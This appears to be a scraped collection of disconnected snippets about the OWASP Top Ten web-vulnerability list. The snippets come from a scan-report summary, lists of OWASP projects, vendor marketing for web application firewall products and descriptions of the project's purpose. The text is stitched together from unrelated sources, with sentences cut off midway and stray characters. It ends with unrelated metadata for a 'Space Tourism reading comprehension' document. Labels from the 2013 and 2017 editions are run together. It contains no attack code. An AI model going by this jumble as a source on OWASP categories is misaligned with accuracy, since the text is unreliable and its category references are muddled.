This report is generated based on OWASP Top Ten 2013 classification. There are 64 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them. 167 vulnerabilities listed in OWASP Top Ten 2013 found on this web site. 1 / 211.
OWASP Code review guide, V1.1 The Ruby on Rails Security Guide v2 OWASP UI Component Verification Project (a.k.a. OWASP JSP Testing Tool) Internationalization Guidelines and OWASP-Spanish Project OWASP Application Security Desk Reference (ASDR) OWASP .NET Project Leader OWASP Education Project
work with clients, we also find that the OWASP Top 10 vulnerabilities are some of the most prevalent. This tells us that all companies should at least be looking for the OWASP Top 10 on a regular basis. A1 - Injection OWASP Top 10 -2013 OWASP Top 10 -2017 A2 - Broken Authentication and Session Managament A3 - Cross-Site Scripting (XSS)
The OWASP Top 10 Proactive Controls is similar to the OWASP Top 10 but is focused on defensive techniques and controls as opposed to risks. Each technique or control in this document will . OWASP Mobile Application Security Verification Standard (MASVS) OWASP Top Ten .
OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases. Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers and managers, it has become . the. de facto application security .
Threat Prevention Coverage – OWASP Top 10 Analysis of Check Point Coverage for OWASP Top 10 Website Vulnerability Classes The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software. OWASP mission is to make software security visible, so that individuals and
developed. Examples include: OWASP Broken Web Applications project, OWASP Joomla Vulnerability Scanner Project. One of the major projects of OWASP as previously highlighted is the Top 10 Project. The Top 10 project started out as a list that identifies and describes the ten most common or prevalent web application vulnerabilities.
Introduction against OWASP Top 10 vulnerabilities. OWASP Top 10 2022 Playbook wwww.indusface.com 04. AppTrana is a complete security as a service solution that helps you identify vulnerabilities in your application and protect against them immediately through virtual patching at the WAF layer.
Microsoft Word - Space Tourism reading comprehension.docx Created Date: 3/27/2018 9:06:16 AM .
